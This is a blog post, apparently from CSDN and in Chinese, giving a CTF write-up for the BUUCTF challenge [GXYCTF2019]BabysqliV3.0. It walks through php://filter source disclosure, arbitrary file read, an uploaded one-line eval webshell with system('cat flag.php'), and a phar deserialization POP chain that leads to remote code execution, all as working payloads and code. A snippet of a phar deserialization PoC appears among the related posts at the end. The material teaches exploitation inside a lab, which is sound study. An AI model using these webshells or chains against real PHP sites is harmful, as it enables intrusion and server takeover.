BUUCTF刷题记录[GXYCTF2019]BabysqliV3.01——涉及phar反序列化pop链

已于 2022-07-01 08:32:59 修改
阅读量1.3k 收藏 4
点赞数
文章标签: php web安全
于 2022-06-30 09:42:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u013119911/article/details/125522861
版权

[GXYCTF2019]BabysqliV3.0

题目是Babysqli,具有一定误导性,会让做题者认为需要sql注入,实际上打开连接输入弱口令:

即可进入

 

        至此应该可以看出来是一个文件上传的题目,点击右键查看源代码,未发现有效信息,

        在地址栏发现?file=upload,如果需要读取源码,从此处猜测应该是需要构造一个伪协议。从题目上来说,需要查看源码进行代码审计,于是构造一个payload:

http://d9dda7b1-60e6-4be2-ba3c-0a67b283c47f.node4.buuoj.cn:81/home.php?file=php://filter/convert.base64-encode/resource=upload

这里需要注意,查看upload.php源代码,后面的resource需要等于upload,不要加.php,程序会自动添加.php,如果添加.php系统自动转化为.fxxkyou!。就会成以下结果:

        于是我们构造两个payload,一个查看home的源代码,一个查看upload的源代码,分别是以下代码:

http://d9dda7b1-60e6-4be2-ba3c-0a67b283c47f.node4.buuoj.cn:81/home.php?file=php://filter/convert.base64-encode/resource=home





http://d9dda7b1-60e6-4be2-ba3c-0a67b283c47f.node4.buuoj.cn:81/home.php?file=php://filter/convert.base64-encode/resource=upload

        输入构造的home源代码payload如下图:

        需要对以上输出的编码进行解码:

        以上解码后的代码即是home.php代码:

<?php
session_start();
echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" /> <title>Home</title>";
error_reporting(0);
if(isset($_SESSION['user'])){
	if(isset($_GET['file'])){
		if(preg_match("/.?f.?l.?a.?g.?/i", $_GET['file'])){
			die("hacker!");
		}
		else{
			if(preg_match("/home$/i", $_GET['file']) or preg_match("/upload$/i", $_GET['file'])){
				$file = $_GET['file'].".php";
			}
			else{
				$file = $_GET['file'].".fxxkyou!";
			}
			echo "当前引用的是 ".$file;
			require $file;
		}
		
	}
	else{
		die("no permission!");
	}
}
?>

        同理获得upload.php源代码:

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 

<form action="" method="post" enctype="multipart/form-data">
	上传文件
	<input type="file" name="file" />
	<input type="submit" name="submit" value="上传" />
</form>

<?php
error_reporting(0);
class Uploader{
	public $Filename;
	public $cmd;
	public $token;
	

	function __construct(){
		$sandbox = getcwd()."/uploads/".md5($_SESSION['user'])."/";
		$ext = ".txt";
		@mkdir($sandbox, 0777, true);
		if(isset($_GET['name']) and !preg_match("/data:\/\/ | filter:\/\/ | php:\/\/ | \./i", $_GET['name'])){
			$this->Filename = $_GET['name'];
		}
		else{
			$this->Filename = $sandbox.$_SESSION['user'].$ext;
		}

		$this->cmd = "echo '<br><br>Master, I want to study rizhan!<br><br>';";
		$this->token = $_SESSION['user'];
	}

	function upload($file){
		global $sandbox;
		global $ext;

		if(preg_match("[^a-z0-9]", $this->Filename)){
			$this->cmd = "die('illegal filename!');";
		}
		else{
			if($file['size'] > 1024){
				$this->cmd = "die('you are too big (′▽`〃)');";
			}
			else{
				$this->cmd = "move_uploaded_file('".$file['tmp_name']."', '" . $this->Filename . "');";
			}
		}
	}

	function __toString(){
		global $sandbox;
		global $ext;
		// return $sandbox.$this->Filename.$ext;
		return $this->Filename;
	}

	function __destruct(){
		if($this->token != $_SESSION['user']){
			$this->cmd = "die('check token falied!');";
		}
		eval($this->cmd);
	}
}

if(isset($_FILES['file'])) {
	$uploader = new Uploader();
	$uploader->upload($_FILES["file"]);
	if(@file_get_contents($uploader)){
		echo "下面是你上传的文件:<br>".$uploader."<br>";
		echo file_get_contents($uploader);
	}
}

?>

         

------------------------------------------开------始------作------答-------------------------------------------------------------------------------------

        非预期解1:

if(isset($_FILES['file'])) {
	$uploader = new Uploader();
	$uploader->upload($_FILES["file"]);
	if(@file_get_contents($uploader)){
		echo "下面是你上传的文件:<br>".$uploader."<br>";
		echo file_get_contents($uploader);
	}
}

        根据以上代码。我们可以看到其中有file_get_contents($uploader)方法,读取文件内容。根据代码分析,网站目录下肯定有一个文件为flag,我们可以利用这个读取文件的函数,读取flag文件,而且,文中并没有对flag进行过滤,因此可以通过将Filename参数改为flag的路径来读取flag信息。

if(isset($_GET['name']) and !preg_match("/data:\/\/ | filter:\/\/ | php:\/\/ | \./i", $_GET['name'])){
			$this->Filename = $_GET['name'];
}

        正好在以上代码中,有设置Filename的方法,就是get到name,控制name的值,改变Filename,我们可以把name参数作为Filename,payload后面为:/home.php?file=upload&name=/var/www/html/flag.php,先访问一下,然后上传一个规则内的文件,伴随着/home.php?file=upload&name=/var/www/html/flag.php一起提交。

即可得到flag{d12cc148-9a0c-464f-8b3e-257b3587e3b2}

       

        非预期解2

        由以上代码分析,该上传文件没有过滤php文件,即可直接上传php文件,连接一句话木马,进行直接输出flag。(也可以上传完一句话木马之后,通过蚁剑连接,找到flag)

        写a.php文件代码如下:

<?php
 @eval($_GET['hack']);
?>

        选择a.php文件上传

        上传的同时使用bp抓包,修改hack参数。,bp界面如下:

        网站的payload如下:

        查询出来有flag.php,使用cat进行读取:

        cat的payload为:(注意中间的空格需要用url编码更换)http://abfcde4a-2eee-4bc8-b3ad-9392c1bb3fa6.node4.buuoj.cn:81/a.php?hack=system(%27cat%20flag.php%27);

        payload加载以后,界面为空,点击右键查看源代码,即可找到flag;

      

        使用bp截图如下:

flag{a5685ea4-e60f-4eb4-9934-0eda3dcd643b}

        预期解       

        审计 upload.php 代码,发现eval($this->cmd);类似于一句话木马的操作,如果能够触发这个方法,那么就可以使用类似cmd='echo system(eval($_GET["hack"]);'这种方法传入一个新的参数hack,再令hack参数为cat flag.php读取flag。

        如果需要触发eval($this->cmd);那么就需要$this->token = $_SESSION['user'],如果需要执行$this->token = $_SESSION['user'],就需要执行__destruct()方法。

        __destruct()该方法为析构函数。只有在对象被垃圾收集器收集前(即对象从内存中删除之前)才会被自动调用。析构函数允许我们在销毁⼀个对象之前执⾏⼀些特定的操作,例如关闭⽂件、释放结果集等。

        换言之,就是该程序会在马上结束全部程序的时候自动执行该函数。eval($this->cmd);根据this指针,需要new一个Uploader。

        接着分析以下代码:

if(isset($_FILES['file'])) {
	$uploader = new Uploader();
	$uploader->upload($_FILES["file"]);
	if(@file_get_contents($uploader)){
		echo "下面是你上传的文件:<br>".$uploader."<br>";
		echo file_get_contents($uploader);
	}
}

        上传一个文件,使得uploader这个对象,可以调用他自身的upload方法传入一个文件,那么我们开始看upload这个方法:

function upload($file){
		global $sandbox;
		global $ext;

		if(preg_match("[^a-z0-9]", $this->Filename)){
			$this->cmd = "die('illegal filename!');";
		}
		else{
			if($file['size'] > 1024){
				$this->cmd = "die('you are too big (′▽`〃)');";
			}
			else{
				$this->cmd = "move_uploaded_file('".$file['tmp_name']."', '" . $this->Filename . "');";
			}
		}
	}

        定义两个全局变量,global $sandbox;global $ext;前者是路径,后者是后缀名,我们可以看到,正则匹配,文件名不允许a-z0-9这些字符。

        例如:[^a-zA-Z] 简单来说就是任意一个非字母的字符,虽然可以匹配除字母之外的任意字符,但只能是一个,不是多个。
        如果想匹配多个非字母的字符,需要在后面加量词修饰,如[^a-zA-Z]+ 表示1个或多个非字母字符。[^a-zA-Z]{5,10} 给示5到10个除字母之外的字符。

        因此,[^a-z0-9]的意思就是该文件名不能是小写字母和数字开头的,否则输出illegal filename! 且文件大小必须小于1024。

        接着往下走,我们下面可以看到该文件中还有包含着两个魔术函数PHP: 魔术方法 - Manual

function __toString(){
		global $sandbox;
		global $ext;
		// return $sandbox.$this->Filename.$ext;
		return $this->Filename;
	}

	function __destruct(){
		if($this->token != $_SESSION['user']){
			$this->cmd = "die('check token falied!');";
		}
		eval($this->cmd);
	}

        一个是__toString方法,一个是__destruct方法,__toString() 方法用于一个类被当成字符串时应怎样回应。例如 echo $obj; 应该显示些什么。__destruct方法上面已经讲过。

        因此,如果需要执行__toString方法,需要一个upload对象,被当作字符串进行echo,我们可以看到在echo file_get_contents($uploader);这串代码里,对象$uploader被读取内容后,被当作字符串输出,这时候就会调用__toString方法,__toString方法调用后,回返回一个$this->Filename;

        而这个Filename我们分析:

if(isset($_GET['name']) and !preg_match("/data:\/\/ | filter:\/\/ | php:\/\/ | \./i", $_GET['name'])){
			$this->Filename = $_GET['name'];
		}
		else{
			$this->Filename = $sandbox.$_SESSION['user'].$ext;
				}

        Filename由name传递参数得到。如果传入phar://文件,就会通过file_get_contents()进行反序列化操作,执行cmd

        分析完毕开始操作

       我们先根据网站提示上传一个符合条件的txt文档:

        可以看到,网站自动输出文件路径,结合 upload.php文件进行分析,

$sandbox = getcwd()."/uploads/".md5($_SESSION['user'])."/";
		//getcwd取得当前工作目录,成功则返回当前工作目录,失败返回 false。 
		//网站输出为/var/www/html/uploads/df4d4167ab7e573ffe9b4fd92b19c4e9/GXY4de07d94caf018e1453439fff2b2375b.txt
		//即getcwd为/var/www/html/,md5($_SESSION['user'])为df4d4167ab7e573ffe9b4fd92b19c4e9,
		$ext = ".txt";
		@mkdir($sandbox, 0777, true);
		if(isset($_GET['name']) and !preg_match("/data:\/\/ | filter:\/\/ | php:\/\/ | \./i", $_GET['name'])){
			$this->Filename = $_GET['name'];
		}
		else{
			$this->Filename = $sandbox.$_SESSION['user'].$ext;
			//这里可以看到GXY4de07d94caf018e1453439fff2b2375b.txt就是$_SESSION['user'].$ext
		}

         根据以上代码分析,可以得到$_SESSION['user']为GXY4de07d94caf018e1453439fff2b2375b     

构造payload文件:phar.php

<?php


class Uploader{
		public $Filename = 'aaa';
		//public $cmd ='echo phpinfo();';//可先用此测试
		public $cmd ='echo system($_GET["hack"]);';//传递一个可控hack参数
		public $token ='GXY4de07d94caf018e1453439fff2b2375b';//先上串一个合法文件得到session['user']
		
}

@unlink("demo.phar");
$phar = new Phar("demo.phar");//后缀名必须为phar
$phar->startBuffering();
$phar->setStub("GIF8a<?php __HALT_COMPILER();?>");
$o    = new Uploader();
$phar -> setMetadata($o);//将自定义的meta-data存入manifest
$phar -> addFromString("text.txt","test");//添加要压缩的文件
//签名自动计算
$phar -> stopBuffering();

?>

运行以上代码,在当前目录生成文件demo.phar(注意:运行当前代码,需要修改php.ini中的phar.readonly = On 改成 Off,且注意phar.readonly前面的;记得去除

 

 运行phar.php代码:

当前目录生成dem.php文件:

上传demo.phar文件到网站。 

 使用bp抓包,构造如下payload:

/home.php?file=upload&name=phar:///var/www/html/uploads/df4d4167ab7e573ffe9b4fd92b19c4e9/GXY4de07d94caf018e1453439fff2b2375b.txt/aaa&hack=ls

可以看到bp右边已经有结果出现,ls查询到了有flag.php,那么为我们把传进去的hack参数改为(cat%20flag.php)即可获得flag

回顾:

        攻击链:

         file_get_contents()使$uploader对象通过__toString()返回$this->Filename,
由于phar://伪协议可以不依赖unserialize()直接进行反序列化操作,加之$this->Filename可控,因此此处通过name传参,$this->Filename配合phar反序列化后,__destruct()方法eval($this->cmd);最终导致了远程代码执行。

        (注:我们自己写的phar.php中利用了__destruct()方法eval($this->cmd);cmd传递了我们自己的一个参数hack,我们在利用hack做了查询等语句)

public $cmd ='echo system($_GET["hack"]);';

大林子木木
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2017-2019蓝桥杯省赛解.rar
03-23
2017-2019蓝桥杯省赛
[GXYCTF 2019]BabySqli
Aiwin的博客
08-10 1383
[GXYCTF 2019]BabySqli
BUUCTF--[GXYCTF2019]BabySQli详解
x1520700的博客
05-23 2618
目预备知识 mysql在查询不存在的数据时会自动构建虚拟数据,一般数据要么明文,要么MD5,源码上用的是md5加密了密码 当没有回显字段时,只能猜测三个字段类型分别为id,username,password 1、经过目名提示,猜测应该是SQL注入,进入目,发现一个登录框功能板,确信应该就是SQL注入,开始注入; 这里分享一个小知识点: sql注入可能出现的功能点 登录页面,留言板,修改信息,获取http请求头(User-agent,referer,xff)等只要是和数据库存在交...
buuctf(探险1)
qq_62046696的博客
08-04 573
此时,为了更加方便进行序列Payload的传输与显示,我们可以在序列内容中用大写S表示字符串,此时这个字符串就支持将后面的字符串用16进制表示。file里面肯定是useless.php,看见下面有序列,所以我觉得这应该是用文件包含然后出源码的擦做,然后password里存的是序列指向一个获得flag的。} 这是三个等号,强比较,会核对值是否相当,以及类型是否一样,我们可以让2为数值型就都可以实现。可是这里的属性都是protected构成的,需要加 \00*\00保护起来,所以我们就需要绕过。.
buuctf [GXYCTF2019]BabySQli
SopRomeo的博客
03-05 5975
常规sql注入都行不通,查看源码发现一个search.php, 先说说base32 和 base64 的区别, base32 只有大写字母和数字数字组成,或者后面有三个等号。 base64 只有大写字母和数字,小写字母组成,后面一般是两个等号。 明显,那段文字是base32加密 解密后:c2VsZWN0ICogZnJvbSB1c2VyIHdoZXJlIHVzZXJuYW1lID0gJyRuYW...
[GXYCTF2019]BabysqliV3.0
qq_62046696的博客
01-12 608
这里的test是为了绕过if(preg_match("[^a-z0-9]", $this->Filename)),只能是纯字母或者纯数字。为什么需要上传两次呢这是因为,执行cmd的方法是在destruct,上传第二次,第一次的就会销毁然后就会执行第一次的结果。在析构方法中找到了,$this->Filename = $sandbox.$_SESSION['user'].$ext;我们需要满足这个认证是成功的,所以需要找到这个session['user']没有这个用户,所以感觉可以使用盲注,对账号进行盲注。
CTF-序列
qq_61774705的博客
08-15 4210
序列
(wp)ctfweb-buu中php序列
qq_51862722的博客
07-12 826
(wp)ctfweb-buu中php序列 我的blog,欢迎来玩 前面整理过php序列的知识点。 1.[极客大挑战 2019]PHP 进入页面,根据提示,考虑备份导致源码泄露。 于是用扫描工具(ctfwscan)进行目录扫描,发现备份文件可以成功访问,如图 然后下载下来,打开,有五个文件: 尝试flag.php后不对,审计class.php和index.php,找到了可序列点 因为包含了class.php文件,所以审计class.php class中没有调用类,根据index中代码,.
BUUCTF之[GXYCTF2019]BabySQli
weixin_44632787的博客
10-03 2348
目 这看到这个页面,而且目上说的。给人的感觉就是个SQL注入。。。。 启动BurpSuite抓包看看 有两个可疑点: 一是报用户错误(wrong user!),通常如果有这种错误的时候要先爆破账号,得到正确的账号后再去爆破密码。 这里返回的绿色部分明显是加密后的数据 首先提取绿色部分的信息,经过排查发现可以先base32解密,再base64 原数据: MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3C
利用PHAR协议进行PHP序列攻击1
08-03
乎所有件操作函数都可触发 phar 序列地址:[CISCN2019 华北赛区 Day1 Web1]Dropbox(链接:进后,随意注册账号上传件,上传点
mix-phar-skeleton:Phar命令行程序开发框架
04-24
Mix Phar Skeleton 命令行单执行文件 Phar 开发程序骨架,Mix 封装的命令行基础设施在骨架中都可使用。 我们提供了打包工具 ,可以将本项目打包为 Phar 文件(就像 golang 编译成执行文件一样)。 PHP 原本就是一个...
phar.scer.io:基于JS的:clamp:在线PHAR转换器
02-05
网站实施 您可以离线使用它! 本地开始 运行yarn start 建立发展 运行yarn build:development 建立生产 运行yarn build:production
codecept.phar
09-23
codecept.phar 测试程序,移动该文件至 存放php 根目录中 存放 php.exe的地方 创建: codecept.bat 输入: ``` @php "%~dp0codecept.phar" %* ``` 使用说明:...
PHP中phar包的使用教程
10-19
php中的phar类似于java中的打包文件jar,即将一个文件夹中的一类文件压缩。下面这篇文章主要给大家介绍了关于PHP中phar包使用的相关资料,文中介绍的还是相对比较详细的,需要的朋友们下面来一起看看吧。
jsfuck、jjencode、aaencode解码方法
fjh1997的博客
04-05 8610
jsfuck、jjencode、aaencode可以被很轻易的还原: 第一步:首先打开谷歌浏览器,进入浏览器控制台。 第二步:去掉最后一行末尾的(),复制加密后的代码; 第三步:在console控制台粘贴你第二步复制的代码; 第四步:回车,达到便能得到解密后的代码。 ...
Web安全 XXE漏洞的 测试和利用.(读取服务器的任何文件 和 收集服务器的内网信息.)
网络安全领域___专研者.
03-08 6172
XXE漏洞全称(XML External Entity Injection),即XML外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成:文件读取、命令执行、内网端口扫描、攻击内网网站,DOS攻击 等危害.(xxe漏洞触发的点往往是可以上传xml文件的位置的,没有对上传的xml文件进行过滤,导致可上传恶意xml文件.)
[GXYCTF2019]BabysqliV3.0-phar序列正解
soldi_er的博客
06-08 480
文章目录phar序列漏洞利用条件构造payload文件漏洞利用参考收获   CSDN已经记录登录过程,弱口令登录,不再赘述。 phar序列漏洞利用条件   可以上传文件。可以执行命令的魔法函数。可以解析phar的函数,并且参数可控。   (1)upload.php可以上传文件。   (2)upload.php,具有执行命令的魔法函数。 class Uploader{ public $Filename; public $cmd; public $token; function __destr
[GXYCTF2019]BabySQli
weixin_43749601的博客
10-28 155
打开目发现是一个登录界面,尝试一下admin,admin弱口令登录,结果提示wrong pass!,查看源码,发现一串特殊的字符。 MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5 然后对其先进base32解密,然后再进行base64解密,得到: select * from user where username = '$name' 接着猜解表中有几个列 a.
phar序列poc
最新发布
05-21
Phar序列漏洞是指攻击者利用PHP中的Phar文件解析器对不受信任数据进行序列攻击的一种安全漏洞。攻击者可以通过构造特定的Phar文件,触发解析器序列恶意代码,从而实现远程代码执行。 一个简单的Phar序列POC如下: ``` <?php class Example { public $command; } $phar = new Phar('phar.phar'); $phar->startBuffering(); $phar->setStub('<?php __HALT_COMPILER(); ?>'); $example = new Example(); $example->command = 'echo "Hello World";'; $phar->setMetadata($example); $phar->stopBuffering(); include 'phar://phar.phar/test.txt'; ?> ``` 上述POC中,攻击者创建了一个含有恶意代码的Phar文件,并将其序列到`$example`变量中,最后通过`include`语句触发远程代码执行。 相关问: 1. 什么是Phar文件? 2. 什么是序列漏洞? 3. 如何防范Phar序列漏洞?

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值